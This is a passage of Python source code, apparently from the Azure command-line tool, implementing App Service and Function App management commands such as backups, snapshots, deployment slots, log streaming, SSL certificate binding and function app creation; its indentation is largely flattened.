sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
    instance.sku = sku_def
if admin_site_name is not None:
instance.admin_site_name = admin_site_name
return instance
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
from datetime import datetime
backup_name = '{0}_{1}'.format(webapp_name, datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
elif any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
else:
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
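# Note: returns a one-element DatabaseBackupSetting list only when all three values are given;
# a partial set is rejected as a usage error, and when none are given it falls through to None.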
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
elif any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
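# Parses a frequency string of the form '<number><unit>', where the unit is 'd' (day) or 'h' (hour);
# e.g. '7d' -> (7, FrequencyUnit.day) and '12h' -> (12, FrequencyUnit.hour).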
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
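# Maps the friendly SKU aliases to their API names ('FREE' -> 'F1', 'SHARED' -> 'D1');
# any other value is simply upper-cased and passed through.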
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.mgmt.resource import ResourceManagementClient
client = get_mgmt_service_client(cli_ctx, ResourceManagementClient)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
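# The SCM (Kudu) endpoint is the host_name_ssl_states entry flagged as HostType.repository;
# for a typical app this resolves to something like https://<app>.scm.azurewebsites.net.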
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
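# Parses the publishing profile XML returned by the service into plain dicts; xmltodict prefixes
# XML attributes with '@' (e.g. '@publishUrl'), which is stripped below.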
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
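# Builds the container CI/CD webhook URL from the MSDeploy publishing profile
# (https://<user>:<password>@<publish-url>/docker/hook) when DOCKER_ENABLE_CI is set to 'true'.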
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
for profile in profiles:
if profile['publishMethod'] == 'MSDeploy':
scmUrl = profile['publishUrl'].replace(":443", "")
cd_url = 'https://' + profile['userName'] + ':' + profile['userPWD'] + '@' + scmUrl + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
break
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
elif action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
else: # reset
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
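# Each distribution entry has the form '<slot>=<percentage>'; e.g. 'staging=25' (an illustrative
# slot name) routes 25% of traffic to that slot's host name via a ramp-up rule.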
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
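# Fetches the app-level publishing credentials used below for basic auth against the
# Kudu/SCM endpoints (e.g. log streaming and log download).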
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
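# Downloads (when log_file is given) or streams Kudu log content over HTTP basic auth;
# a non-200 response is surfaced as a CLIError.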
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode for stdout which does not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, location,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=location)
name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
return _generic_site_operation(cli_ctx, resource_group_name, name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
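# e.g. a certificate host name of '*.contoso.com' (illustrative) matches 'www.contoso.com' and
# 'api.contoso.com' among the webapp's host names, but not the apex 'contoso.com'.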
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
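# resolve() performs a case-insensitive lookup of a display name (e.g. 'node|6.1') against the
# lazily loaded stack list; Windows entries also carry a 'configs' map, and every entry gets a 'setter'.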
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, sku,
number_of_workers=None, location=None, tags=None):
# This command merely shadows 'az appservice plan create' except with a few parameters
return create_app_service_plan(cmd, resource_group_name, name, is_linux=None, hyper_v=None,
sku=sku, number_of_workers=number_of_workers, location=location, tags=tags)
def is_plan_Elastic_Premium(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, consumption_plan_location=None,
app_insights=None, app_insights_key=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
        # for a Linux consumption plan app, os_type must be Linux and a runtime must be specified;
        # currently, in other cases the runtime is ignored
if is_linux and not runtime:
raise CLIError("usage error: --runtime RUNTIME required for linux functions apps with consumption plan.")
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
elif not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
if consumption_plan_location:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='beta'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
site_config.linux_fx_version = _format_fx_version('appsvc/azure-functions-runtime')
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION', value='8.11.1'))
if consumption_plan_location is None and not is_plan_Elastic_Premium(plan_info):
site_config.always_on = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
